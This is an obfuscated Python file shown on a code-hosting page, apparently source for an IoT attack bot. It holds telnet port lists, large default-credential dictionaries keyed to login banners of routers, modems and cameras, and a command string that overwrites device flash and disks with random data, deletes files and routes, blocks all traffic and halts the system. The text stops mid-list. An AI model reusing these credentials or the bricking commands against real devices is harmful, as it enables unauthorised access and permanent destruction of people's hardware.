Skip to content
Permalink
 
 
Cannot retrieve contributors at this time
if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
if 21 - 21: Oooo - I11I1Ii
if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
time . sleep ( 3 )
if 20 - 20: Oo0
if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
if 84 - 84: I11I1Ii * Ii11i1iIi
I1IiI1I1 = OOo0O0oOOOO
if 4 - 4: Oooo + oOOo0000o
if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
i111IIIiII1i = False
Oo0O00OOooO = False
IiiI1 = False
oOI11IIIi1II111 = True
iiIII11I1i1Ii = True
I1i = True
i11iiiIi = True
i1iii = True
OOoOo00oO0 = True
OO00oo0o = True
if 5 - 5: IIiII + O0oo - i1
if 52 - 52: oOoO0Ooo / Ii / Ii
if 24 - 24: oOOoO00oo0
i11 = [ ]
II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 , 88 , 81 , 8080 , 8081 , 49152 , 5431 ]
if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
O0oO0ooooOO = [ ]
Iiii = { }
oOo00o = [ ]
O0oOo = { }
I1I1I11 = { }
if 53 - 53: O0oo . OOOoOooO % i1IIi1i1iiI % O0oo + O0oo * IIiII
if 27 - 27: i1IIi1i1iiI / i1IIi1i1iiI - IIiIIiIii1I % O0oo0OOOOO00 % Ii / Ii
OoooOoo0 = [ 80 , 81 , 82 , 8000 , 5555 , 8080 , 7547 , 8081 , 37215 , 52869 ]
oOiI1iIiIi111 = [ 22 , 23 , 80 , 81 , 82 , 8000 , 2222 , 2323 , 8080 , 8081 , 23231 , 23123 , 6789 , 7547 , 5555 , 19058 , 8023 , 8022 , 5358 , 5000 , 5001 , 8888 , 9000 , 88 , 12323 , 8181 , 60023 ]
I1i11II = 30
I1i1 = 10
O0OoO0O = 17
o0o = 3
o0o0oOOo = [ ]
oO0iIiiiii1 = { }
i11I11III1iii = { }
O0OO0O00000 = { }
OooO = { }
O000O0o0oOOo = { }
i1II = { }
ii1o00 = [ ]
i1IIOO0OOoO00OO = 0
I1i11IIii1iI1i1 = time . time ( )
if 91 - 91: I11I1Ii
iIii1IiI11II1 = [ 22 , 2222 , 5358 , 6789 , 19058 ]
if 65 - 65: O0oo / OOooOO0 % Oo0 / Ii % Ii11i1iIi
if 75 - 75: Ii11i1iIi % Ii11i1iIi * I11I1Ii / Oooo / Oo0Oo * O0oo0OOOOO00
iiI1iiI = [ 22 , 23 , 2222 , 2323 , 6789 ]
IIIii = 1
iIoO0O000oo = [ 15 , 30 , 60 , 120 , 240 , 480 ]
Oo0Oooo = [ ]
IiIIiI1iII1Ii = [ ]
oO0OoOoO00OoO = { }
if 55 - 55: o0oooooO . O0oo0OOOOO00 . i1IIi1i1iiI % Oooo / IIiIii1iI - i1IIi1i1iiI
if 50 - 50: i1IIi1i1iiI . Oooo - Oooo . IIiII
if 47 - 47: IIiIIiIii1I % Oo0Oo - oOOoO00oo0 + o0ooO
if 47 - 47: I11I1Ii
i1I1 = 100
OoO00 = 3
if 45 - 45: O0oo * o0ooO - oOOo0000o
ooiI1 = 90
O0oOOoO = 600
oOooOooO0ooO = 20
if 27 - 27: i1
if 90 - 90: IIiII . Oooo - o0ooO % o0oooooO - IIiIIiIii1I
if 40 - 40: Oo0Oo / o0ooO / oOoO0Ooo . IIiIii1iI . o0ooO
ii11II = 'cat /proc/mounts\ncat /dev/urandom | mtd_write mtd0 - 0 32768\ncat /dev/urandom | mtd_write mtd1 - 0 32768\n'
ii11II += 'busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/sda &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\n'
ii11II += 'busybox route del default\ncat /dev/urandom >/dev/mtdblock0 &\ncat /dev/urandom >/dev/mtdblock1 &\ncat /dev/urandom >/dev/mtdblock2 &\ncat /dev/urandom >/dev/mtdblock3 &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mmcblk0 &\ncat /dev/urandom >/dev/mmcblk0p9 &\ncat /dev/urandom >/dev/mmcblk0p12 &\ncat /dev/urandom >/dev/mmcblk0p13 &\ncat /dev/urandom >/dev/root &\ncat /dev/urandom >/dev/mmcblk0p8 &\ncat /dev/urandom >/dev/mmcblk0p16 &\n'
ii11II += 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &\niptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP\nhalt -n -f\nreboot\n'
if 57 - 57: IIiIii1iI + i1 * i1IIi1i1iiI
if 36 - 36: oOOoO00oo0 / oOOo0000o
if 28 - 28: IIiIIiIii1I + Ii * i1 % IIiIIiIii1I
if 66 - 66: OOooOO0 % O0oo0OOOOO00
if 36 - 36: OOOoOooO / O0oo . Ii11i1iIi / o0ooO - o0ooO % i1IIi1i1iiI
def Oo000o0OOOo ( filename , bootup = False ) :
global i111IIIiII1i
global Oo0O00OOooO
global IiiI1
global oOI11IIIi1II111
global iiIII11I1i1Ii
global I1i
global i11iiiIi
global i1iii
global OOoOo00oO0
global OO00oo0o
global II1I1i11
global oOiI1iIiIi111
global OoooOoo0
if 12 - 12: Oooo
Ooo0OO00 = [ ]
oOo0oo = [ ]
iII = [ ]
Ooo0o0 = 0
if 13 - 13: i1IIi1i1iiI - oOOoO00oo0
if 30 - 30: oOOoO00oo0 / i1 - IIiII - Oooo * Oo0Oo * IIiII
try :
iiI = open ( filename , 'r' )
iiIi1IiII = iiI . read ( ) . split ( '\n' )
for III1I in iiIi1IiII :
Oo00oO0O = re . search ( 'sTN: (\d+)' , III1I )
if Oo00oO0O :
i111IIIiII1i = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sSO: (\d+)' , III1I )
if Oo00oO0O :
Oo0O00OOooO = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sSR: (\d+)' , III1I )
if Oo00oO0O :
IiiI1 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sSD: (\d+)' , III1I )
if Oo00oO0O :
oOI11IIIi1II111 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sBR: (\d+)' , III1I )
if Oo00oO0O :
iiIII11I1i1Ii = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sBL: (\d+)' , III1I )
if Oo00oO0O :
I1i = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'sWP: (\d+)' , III1I )
if Oo00oO0O :
i11iiiIi = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'eSC: (\d+)' , III1I )
if Oo00oO0O :
i1iii = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'eBR: (\d+)' , III1I )
if Oo00oO0O :
OOoOo00oO0 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
Oo00oO0O = re . search ( 'eWP: (\d+)' , III1I )
if Oo00oO0O :
OO00oo0o = bool ( int ( Oo00oO0O . group ( 1 ) ) )
Ooo0o0 += 1
if 'aLP: ' in III1I [ : 7 ] :
Ooo0o0 += 1
III11 = re . compile ( '(\d+)' )
Ii11I = [ ] ;
for OO0OO in III11 . finditer ( III1I ) :
if not OO0OO in Ii11I :
Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
Ooo0OO00 = Ii11I
if 'aSC: ' in III1I [ : 7 ] :
Ooo0o0 += 1
III11 = re . compile ( '(\d+)' )
Ii11I = [ ] ;
for OO0OO in III11 . finditer ( III1I ) :
if not OO0OO in Ii11I :
Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
oOo0oo = Ii11I
if 'aWP: ' in III1I [ : 7 ] :
Ooo0o0 += 1
III11 = re . compile ( '(\d+)' )
Ii11I = [ ] ;
for OO0OO in III11 . finditer ( III1I ) :
if not OO0OO in Ii11I :
Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
iII = Ii11I
iiI . close ( )
except :
Ii111i11iIi ( 'ERR: Sentinel could not read config.' )
return
if Ooo0o0 < 9 :
if 81 - 81: IIiIIiIii1I % O0oo0OOOOO00 + I11I1Ii
Ii111i11iIi ( "NOTC: Sentinel ignoring config due to lack of data." )
return
oOiI1iIiIi111 = oOo0oo
OoooOoo0 = iII
if 62 - 62: o0oooooO + OOooOO0 + I11I1Ii
if bootup :
II1I1i11 = Ooo0OO00
return
if 39 - 39: Ii11i1iIi * o0ooO / IIiII / I11I1Ii
if 94 - 94: IIiIii1iI * o0ooO + Oo0Oo * IIiIii1iI * Ii11i1iIi
for Ooo0o0oOO0o in Ooo0OO00 :
if not Ooo0o0oOO0o in II1I1i11 :
O0O0 = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
O0O0 . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
try :
O0O0 . bind ( ( '0.0.0.0' , int ( Ooo0o0oOO0o ) ) )
O0O0 . listen ( 5 )
O0oO0ooooOO . append ( O0O0 )
Iiii [ int ( Ooo0o0oOO0o ) ] = O0O0
Ii111i11iIi ( "NOTC: Sentinel added listening port %d" % ( int ( Ooo0o0oOO0o ) ) )
except :
pass
for Ooo0o0oOO0o in II1I1i11 :
if not Ooo0o0oOO0o in Ooo0OO00 :
if 85 - 85: oOoO0Ooo - o0ooO
if int ( Ooo0o0oOO0o ) in Iiii :
O0O0 = Iiii [ int ( Ooo0o0oOO0o ) ]
if O0O0 in O0oO0ooooOO :
try :
O0O0 . close ( )
except :
pass
O0oO0ooooOO . remove ( O0O0 )
Iiii [ int ( Ooo0o0oOO0o ) ] = None
Ii111i11iIi ( "NOTC: Sentinel removed listening port %d" % ( int ( Ooo0o0oOO0o ) ) )
II1I1i11 = Ooo0OO00
if 24 - 24: IIiIIiIii1I - i1IIi1i1iiI . o0oooooO / oOOo0000o . OOOoOooO
Oo000o0OOOo ( '/tmp/system/control.cfg' , True )
if 29 - 29: i1IIi1i1iiI + O0oo * Oo0Oo * OOOoOooO - OOooOO0 * i1IIi1i1iiI
if 36 - 36: oOOo0000o
if 36 - 36: Ii11i1iIi + IIiIIiIii1I - oOOoO00oo0 . Oo0 - Oo0Oo . O0oo0OOOOO00
if 65 - 65: OOOoOooO * OOOoOooO * oOOo0000o % i1 . Oo0 - O0oo
i1I1iIIi1 = [
[ 'Login authentication' ,
'admin/' ,
'root/' ,
'password/password' ,
'telecom/telecom' ,
'admin/admin' ,
'root/root' ,
] ,
[ 'Password:' ,
'/' ,
'/' ,
] ,
[ 'GAPM-\d\d\d\d login' ,
'root/root' ,
] ,
[ 'PORT:9527:' ,
'admin/' ,
'admin/admin' ,
'admin/123456' ,
'admin/' ,
'admin/12345' ,
'admin/aa888888' ,
'admin/admin' ,
'admin/1234' ,
'admin/888888' ,
'admin/123456' ,
'admin/0000' ,
'admin/1111' ,
'admin/666666' ,
'admin/654321' ,
'admin/111111' ,
'admin/123' ,
'admin/1' ,
'admin/admin123' ,
'admin/123abc456' ,
'admin/000000' ,
'admin/7773' ,
'admin/112233' ,
'admin/8888' ,
'admin/1453' ,
'admin/34567' ,
'admin/686868' ,
'admin/12345678' ,
'admin/900009' ,
'admin/54321' ,
'admin/2499' ,
'admin/123321' ,
'admin/bdc3939' ,
'admin/4321' ,
'admin/88888888' ,
'admin/abc123' ,
'admin/admin1' ,
'admin/9914' ,
'admin/168168' ,
'admin/spc123' ,
'admin/sks12345' ,
'admin/1212' ,
'admin/13579' ,
'admin/102030' ,
'admin/34588' ,
'admin/1122' ,
'admin/121234' ,
'admin/11111' ,
'admin/9999' ,
'admin/81171762' ,
'admin/2580' ,
'admin/999999' ,
'admin/9742' ,
'admin/2016' ,
'admin/1974' ,
'admin/admin12345' ,
'admin/peak0429' ,
'admin/123654' ,
'admin/1987' ,
'admin/1988' ,
'admin/siera' ,
'admin/2734988' ,
'admin/55555' ,
'admin/1023' ,
'admin/123123' ,
'admin/88888' ,
'admin/9001' ,
'admin/123456789' ,
'admin/1985'
'admin/1010' ,
'admin/2014' ,
'admin/7777777' ,
'admin/1976' ,
'admin/2222' ,
'admin/222222' ,
'admin/7764' ,
'admin/54637767' ,
'admin/00000' ,
'admin/5555' ,
'admin/0257' ,
'admin/717766' ,
'admin/555' ,
'admin/1234567' ,
'admin/1103' ,
'admin/121212' ,
'admin/1967' ,
'admin/456' ,
] ,
]
if 99 - 99: OOooOO0 - O0oo0OOOOO00 - O0oo / OOOoOooO . Ii
if 49 - 49: O0oo0OOOOO00
ooo0o00O00 = [
[ 'GM login:' ,
"root/GM8182" ,
] ,
[ 'LocalHost login:' ,
'root/xc3511' ,
"root/xmhdipc" ,
] ,
[ '\(none\) login:' ,
'vstarcam2015/20150602' ,
'root/5up' ,
'root/' ,
'root/vizxv' ,
"root/juantech" ,
"root/zlxx." ,
'root/antslq' ,
'admin/admin' ,
'root/123456' ,
'root/1001chin' ,
'root/win1dows' ,
'admin/7ujMko0admin' ,
'user/user' ,
'root/jvbzd' ,
'root/123' ,
'admin/0000' ,
'ftp/ftp' ,
'root/7ujMko0vizxv ' ,
'root/hunt5759' ,
'123/123' ,
'root/ivdev' ,
] ,
[ 'Welcome to Zhone Technologies' ,
'admin/zhone' ,
] ,
[ 'host login:' ,
'root/vizxv' ,
] ,
[ 'TL-WR7' ,
'root/5up' ,
] ,
[ 'F6' ,
'root/Zte521' ,
] ,
[ 'netween\.co\.kr' ,
'baby/baby' ,
] ,
[ 'kopp login' ,
'root/kopp' ,
] ,
[ 'MikroTik' ,
'admin/' ,
'user/user' ,
'admin/' ,
'installer/installer' ,
'admin/admin' ,
'test/test' ,
'admin/12345' ,
'admin/passw0rd' ,
'admin/1234567890' ,
'admin/password' ,
'admin/admin123' ,
'support/support' ,
'admin/11111111' ,
'admin/P@55w0rd!' ,
'admin/888888' ,
'admin/1234' ,
'admin/123456' ,
'admin/tsunami' ,
'admin/admin1' ,
'0/0' ,
'guest/guest' ,
'admin/123' ,
'admin/1111' ,
'admin/admin1234' ,
'admin/654321' ,
'admin/4321' ,
'admin/admin99' ,
'admin/operator' ,
'admin/hello' ,
'admin/54321' ,
'admin/666666' ,
'test/test123' ,
'root/root' ,
'operator/operator' ,
'monitor/monitor' ,
'admin/abc123' ,
'admin/system' ,
'admin/secure' ,
'router/router' ,
'ftp/ftp' ,
'Admin/Admin' ,
'admin/0000' ,
'ubnt/ubnt' ,
'guest/123456' ,
'1234/1234' ,
'admin/Admin123' ,
'admin/admin00' ,
'admin/99999999' ,
'admin/motorola' ,
'admin/administrator' ,
'admin/2222' ,
'user/admin' ,
'root/root1234' ,
'root/root123' ,
'root/qwerty' ,
'root/password' ,
'root/12345' ,
'root/1234' ,
'root/123' ,
'guest/guest123' ,
'admin/vnpt' ,
'admin/test' ,
'admin/root' ,
'admin/power' ,
'Administrator/' ,
'admin/diamond' ,
'admin/conexant' ,
'admin/atlantis' ,
'admin/ADMIN' ,
'1/1' ,
'root/12345678' ,
'888888/888888' ,
] ,
[ 'Welcome to JNIOR' ,
'jnior/jnior' ,
'admin/admin' ,
'jnior/1234' ,
'admin/1234' ,
] ,
[ 'Welcome to slush' ,
'jnior/jnior' ,
'admin/admin' ,
'jnior/1234' ,
'admin/1234' ,
'root/tini' ,
'guest/guest' ,
] ,
[ 'heluyou login' ,
'admin/h@32LuyD' ,
] ,
[ 'OpenEmbedded Linux mdm9625' ,
'admin/admin' ,
] ,
[ 'PK5001Z login' ,
'admin/CenturyL1nk' ,
'admin/CTLSupport12' ,
'admin/QwestM0dem' ,
] ,
[ 'Ruijie login' ,
'ruijie/ruijie' ,
] ,
[ 'DSL-500B' ,
'TMAR#DLKT20060205/DLKT20060205\n' ,
'admin/admin\n' ,
] ,
[ 'BusyBox on \S+ login' ,
'admin/admin' ,
'admin/1234' ,
'root/Admin' ,
'root/' ,
'root/admin' ,
'user/user' ,
'admin/QwestM0dem' ,
'admin/xad$l#12' ,
'root/12345' ,
'root/password' ,
'root/1234567890' ,
'root/123456' ,
'admin/password' ,
'root/1234' ,
'Admin/Admin' ,
'admin/1111' ,
'admin/admin123' ,
'admin/qwerty' ,
'admin/nimda' ,
] ,
[ 'Account:' ,
'admin/1234' ,
] ,
[ 'ktcatv login' ,
'super/root' ,
'admin/admin' ,
] ,
[ 'Actiontec xDSL Router' ,
'admin/CenturyL1nk' ,
'admin/CTLSupport12' ,
'admin/QwestM0dem' ,
] ,
[ '!Login:' ,
'admin/admin' ,
'admin/ho4uku6at' ,
'root/root' ,
'support/support' ,
'admin/admin1' ,
'admin/1234' ,
'admin/epicrouter' ,
'admin/admin1234' ,
'admin/admin123' ,
'admin/12345' ,
'telecomadmin/nE7jA%5m' ,
'admin/1111' ,
'admin/888888' ,
'admin/54321' ,
'supervisor/zyad1234' ,
'admin/123' ,
'admin/root' ,
'admin/system' ,
'manager/friend' ,
'admin/123456' ,
'admin/4321' ,
'anonymous/anonymous' ,
] ,
[ '(Router;Login|Gateway;Login)' ,
'admin/admin' ,
'admin/1234' ,
'superadmin/Is$uper@dmin' ,
'root/12345' ,
'admin/password' ,
'user/user' ,
'tmadmin/tmadmin' ,
'support/support' ,
'support/admin' ,
'admin/ho4uku6at' ,
'1234/1234' ,
'supervisor/zyad1234' ,
'admin/362729' ,
'user/password' ,
'admin/admin1' ,
'admin/admin1234' ,
'admin/admin123' ,
'admin/abc123' ,
'admin/12345' ,
'admin/123' ,
'root/root' ,
'admin/1111' ,
'admin/administrator' ,
'admin/power' ,
'root/admin' ,
'admin/123456' ,
'ZXDSL/ZXDSL' ,
'admin/gvt12345' ,
'telecomadmin/nE7jA%5m' ,
'tech/tech' ,
'ADSL/export03' ,
'admin/adslroot' ,
'admin/utstar' ,
'admin/CenturyL1nk' ,
'admin/CTLSupport12' ,
] ,
[ '!Username:' ,
'admin/admin' ,
'user/user' ,
'telecomadmin/nE7jA%5m' ,
'guest/guest' ,
] ,
[ 'UTT login:' ,
'admin/admin' ,
'admin/123456' ,
'admin/54321' ,
'admin/admin123' ,
'admin/password' ,
'admin/Admin123' ,
'admin/1234567890' ,
'admin/*58298' ,
'admin/2oiidxii22' ,
'admin/19761213' ,
'admin/4276365' ,
'admin/nimda' ,
'admin/adminadmin' ,
'admin/guest' ,
'admin/a' ,
'admin/ADMIN' ,
'admin/administrator' ,
'admin/adminstrator' ,
'admin/root' ,
'guest/guest' ,
'guest/123456' ,
] ,
[ 'DSL5\S+ login:' ,
"admin/admin" ,
"admin/bayandsl" ,
] ,
[ 'TELNET session now in ESTABLISHED state' ,
'Manager/friend' ,
] ,
[ 'Remote Management Console' ,
'netscreen/netscreen' ,
'localadmin/localadmin' ,
] ,
[ 'ANS\d\d\S+ login' ,
'telnet/telnet' ,
] ,
[ 'hktos login' ,
'root/public' ,
] ,
[ 'H6\d\S+ login' ,
'root/vertex25ektks123' ,
] ,
[ 'VMG\d+\-B10D' ,
'root/zyad1234' ,
'supervisor/zyad1234' ,
'admin/admin1234' ,
'admin/admin' ,
'admin/1234' ,
'admin/password' ,
'zyuser/1234' ,
'support/support' ,
'user/user' ,
] ,
[ 'tc login' ,
'admin/1234' ,
'root/vertex25ektks123' ,
'admin/admin' ,
'support/support' ,
'admin/12345' ,
'admin/admin1' ,
'admin/123456' ,
'admin/password' ,
'admin/0000' ,
'admin/ttnet' ,
'admin/4321' ,
'admin/1234567890' ,
'admin/admin123' ,
'admin/1111' ,
'admin/54321' ,
'admin/admin1234' ,
'admin/654321' ,
'admin/administrator' ,
'engineer/amplifier' ,
'admin/service' ,
'admin/adsl' ,
] ,
[ '(ralink|aquario) login' ,
'Admin/' ,
'admin/aquario' ,
'admin/admin' ,
'Admin/123456' ,
'admin/h@32LuyD' ,
'admin/aquario' ,
'Admin/' ,
'admin/admin' ,
'Admin/' ,
] ,
[ 'Welcome to RS' ,
'admin/admin' ,
'write/private' ,
] ,
[ 'telnet session telnet0' ,
'test1/test1' ,
] ,
[ '870HNU' ,
'1234/1234' ,
] ,
[ 'Ubee Interactive Corporation Telnet Server' ,
'root/root' ,
] ,
[ 'davolink login' ,
'root/admin' ,
'admin/admin' ,
'davo/drc' ,
] ,
[ 'login :' ,
'admin/switch' ,
] ,
[ 'Comtrend Gigabit' ,
'1234/1234' ,
] ,
[ 'SAMSUNG ELECTRONICS .*Login' ,
'root/' ,
'admin/password' ,
] ,
[ 'iGate .*ADSL' ,
'admin/vnpt' ,
'operator/operator' ,
] ,
[ 'DD-WRT v24' ,
'root/samsung' ,
] ,
[ 'MontaVista.*Linux' ,
'ftp/ftp' ,
'admin/admin' ,
'service/service' ,
'admin/123456' ,
] ,
[ 'Aamra Networks LIMITED' ,
'support/support123' ,
] ,
[ 'domain\.name login' ,
'Admin/' ,
] ,
[ 'EDR\-\S+ login' ,
'user/' ,
] ,
[ '(192.0.0.64|dvrdvs|Hikvision) login' ,
'root/12345' ,
'root/888888' ,
'root/54321' ,
'root/123456' ,
'root/000000' ,
'root/00000' ,
'root/1234' ,
'root/1' ,
'root/123' ,
'root/1234567890' ,
'root/321' ,
'root/1234567' ,
'root/123123' ,
'root/696969' ,
'root/4321' ,
'root/1111' ,
'root/1234qwer' ,
'root/password' ,
'root/pu' ,
'root/0000' ,
'root/admin' ,
'root/5555' ,
'root/7777' ,
'root/11111' ,
'root/654321' ,
'root/hikvision' ,
'root/123456789abc' ,
'admin/12345' ,
'admin/1234' ,
'admin/1234567890' ,
'admin/admin1234' ,
'admin/123456' ,
'admin/admin' ,
'admin/666666' ,
'admin/654321' ,
'admin/1111' ,
'admin/admin1' ,
'admin/22222' ,
'admin/power' ,
'admin/abc123' ,
'admin/11111111' ,
'admin/2222' ,
'admin/0000' ,
'admin/4321' ,
'admin/123456789abc' ,
'guest/12345' ,
'hikvision/hikvision' ,
] ,
[ '[rR][tT]-2\d+ login' ,
'root/ttnet' ,
] ,
[ '(t4-main|sanyo-board|smarteyes) login' ,
'root/m' ,
'root/mobiroot' ,
'mg3500/merlin' ,
] ,
[ 'meritlilin' ,
'root/pass' ,
] ,
[ 'MultiQb login' ,
'root/admin' ,
] ,
[ 'Avaya Cajun' ,
'diag/danger' ,
] ,
[ 'DB88FXX81 login' ,
'root/svgodie' ,
] ,
[ 'Draytek login' ,
'draytek/1234' ,
] ,
[ 'Tera-EP login' ,
'admin/admin' ,
'admin/1q2w3e' ,
] ,
[ 'HDFW System' ,
'hscroot/abc123' ,
] ,
[ 'Copyright \(c\) 2004-20\d\d Hangz' ,
'admin/admin' ,
'admin/admin123' ,
'admin/123456' ,
'admin/' ,
'root/admin' ,
'admin/Admin' ,
'admin/admin1' ,
'admin/admin1234' ,
'telecom/telecom' ,
'webadmin/webadmin' ,
'guest/guest' ,
'123/123' ,
'root/123' ,
'user/user' ,
'root/root' ,
'admin/system' ,
'admin/adminadmin' ,
'root/' ,
'telecomadmin/nE7jA%5m' ,
'root/123456' ,
'admin/0000' ,
'admin/654321' ,
'simple/h3c' ,
] ,
[ 'Copyright \(c\) 2010-2012 Hewle' ,
'admin/admin' ,
'admin/admin123' ,
'admin/password' ,
] ,
[ 'Dlink-Router login' ,
'admin/qwerty' ,
'admin/admin' ,
'admin/12345' ,
'admin/123456' ,
] ,
[ 'this is ROS' ,
'administrator/administrator' ,
] ,
[ 'AG 5\d+' ,
'operator/operator' ,
] ,
[ 'BCM99999.*VosLogin' ,
'admin/zhone' ,
'root/1234567890' ,
'root/54321' ,
'admin/Admin' ,
'IntraStack/Asante' ,
'root/cat1029' ,
'admin/smcadmin' ,
'admin/admin' ,
'admin/4321' ,
'admin/1234' ,
'admin/1234567890' ,
'ubnt/ubnt' ,
'guest/guest123' ,
'root/' ,
'quser/quser' ,
'user/user' ,
'Alphanetworks/wrgn23_dlwbr_dir600b' ,
] ,
[ 'BCM963268 Broadband' ,
'support/support' ,
'support/1234' ,
'admin/admin' ,
'1234/1234' ,
'admin/adslroot' ,
'admin/CenturyL1nk' ,
] ,
[ 'BCM96338 ADSL' ,
'admin/password' ,
'support/support' ,
'admin/362729' ,
'admin/263297' ,
'admin/admin' ,
] ,
[ 'BCM96328 Broadband' ,
'admin/password' ,
'admin/admin' ,
'support/support' ,
'user/user' ,
'1234/1234' ,
'user/user' ,
'admin/administrator' ,
'support/1234' ,
'root/12345' ,
'admin/gvt12345' ,
'admin/362729' ,
'admin/' ,
] ,
[ 'BCM96818 Broadband' ,
'user/user' ,
'admin/password' ,
'user/password' ,
] ,
[ 'BCM96318 Broadband' ,
'support/support' ,
'admin/admin' ,
'superadmin/Is$uper@dmin' ,
'user/user' ,
'admin/ho4uku6at' ,
'support/1234' ,
'admin/admin1234' ,
'admin/admin01' ,
] ,
[ 'BCM96362 Broadband' ,
'user/' ,
] ,
[ 'BCM96368 xDSL' ,
'support/support' ,
'telecomadmin/nE7jA%5m' ,
] ,
[ 'Residential Gateway' ,
'support/support' ,
'user/password' ,
] ,
[ 'router login:' ,
'admin/1234' ,
'user/1234' ,
] ,
[ 'NetComm ADSL2\S Wireless Router' ,
'admin/admin' ,
'support/support' ,
'admin/362729' ,
] ,
[ 'Embedded Telnet Server.*WARNING:.*authorized users only' ,
'cisco/cisco' ,
] ,
[ 'User Access Verification' ,
"admin/admin" ,
"cisco/cisco" ,
"root/root" ,
"admin/" ,
"cisco/" ,
"Cisco/Cisco" ,
"admin/cisco" ,
"administrator/administrator" ,
"Advertisements/Advertisements" ,
"admin/123456" ,
"admin/password" ,
"admin/admin123" ,
"Administrator/password" ,
"Admin/123" ,
"router/router" ,
"test/test123" ,
"service/service" ,
'admin/admin12345' ,
'test/test' ,
'admin/test' ,
'root/1234' ,
'telecom/telecom' ,
'user/user' ,
'admin/admin1' ,
'Admin/123' ,
'nagios/nagios' ,
'mg3500/merlin' ,
'Admin/1234' ,
'piranha/piranha' ,
'admin/root' ,
'admin/ADMIN' ,
'guest/guest' ,
'admin/1234567890' ,
'root/root1234' ,
'support/123456' ,
'test1/test1' ,
] ,
[ 'DAM-2160i' ,
'admin/888888' ,
] ,
[ 'Please login' ,
'super/sp-admin' ,
'admin/password' ,
'admin/sp-admin' ,
] ,
[ 'Admin/Admin' ,
'Admin/Admin' ,
] ,
[ 'Elsist.*maintenance shell' ,
'Admin/Admin' ,
] ,
[ '(Welcome Visiting Huawei Home|ATP Cli)' ,
'admin/admin' ,
'user/user' ,
'root/admin' ,
'admin/1234' ,
'support/support' ,
] ,
[ '(AONT login|## login ##|192\.168\.0\.0 login)' ,
'ONTUSER/SUGAR2A041' ,
'root/root' ,
'root/huigu309' ,
'admin/admin' ,
'IUSACELL/admin' ,
'usradmin/usradmin' ,
'CRAFTSPERSON/ALC#FGU' ,
] ,
[ 'Air\S+ login' ,
'root/12341234' ,
'root/admin' ,
'root/' ,
'admin/airlive' ,
'root/1234567' ,
'root/12341234' ,
'root/ttnet' ,
'root/1111' ,
'root/1020304' ,
] ,
[ 'RT\-\d+\S+ login' ,
'root/12341234' ,
'root/Admin' ,
'root/ttnet' ,
'root/00000' ,
'admin/qwerty' ,
] ,
[ 'WR\d\d\S+ login' ,
'telnet/telnet' ,
] ,
[ 'ANS\S+ login' ,
'telnet/telnet' ,
] ,
[ 'Huawei Home Gateway' ,
'support/support' ,
] ,
[ 'FG1060N login' ,
"root/20080826"
] ,
[ 'HT-TM05 login' ,
"root/20080826"
] ,
[ 'M2M login' ,
"root/20080826"
] ,
[ 'NEXTAV login' ,
"root/20080826"
] ,
[ 'SVWIFI login' ,
"root/20080826"
] ,
[ 'TM01 login' ,
"root/20080826"
] ,
[ 'TM02 login' ,
"root/20080826"
] ,
[ 'WD02 login' ,
"root/20080826"
] ,
[ 'WD-N2 login' ,
"root/20080826"
] ,
[ 'WeZeeCard login' ,
"root/20080826"
] ,
[ 'WiDisk login' ,
"root/20080826"
] ,
[ 'WIFIUSB2 login' ,
"root/20080826"
] ,
[ 'ShAirDisk login' ,
"root/20080826"
] ,
[ 'aigoWiFi login' ,
"root/20080826"
] ,
]
if 32 - 32: oOOo0000o - Oo0Oo * OOooOO0 . Oo0Oo / oOOoO00oo0 % Oooo
I1IIiI1i = [
"root/root" ,
"admin/admin" ,
"root/vizxv" ,
"root/GM8182" ,
"root/xc3511" ,
"root/xmhdipc" ,
"admin/1234" ,
"admin/CenturyL1nk" ,
"admin/QwestM0dem" ,
"support/support" ,
"root/123456" ,
"root/1234" ,
"root/12345" ,
"root/1001chin" ,
"root/password" ,
"admin/password" ,
"root/54321" ,
"root/juantech" ,
"root/admin" ,
"admin/7ujMko0admin" ,
"admin/smcadmin" ,
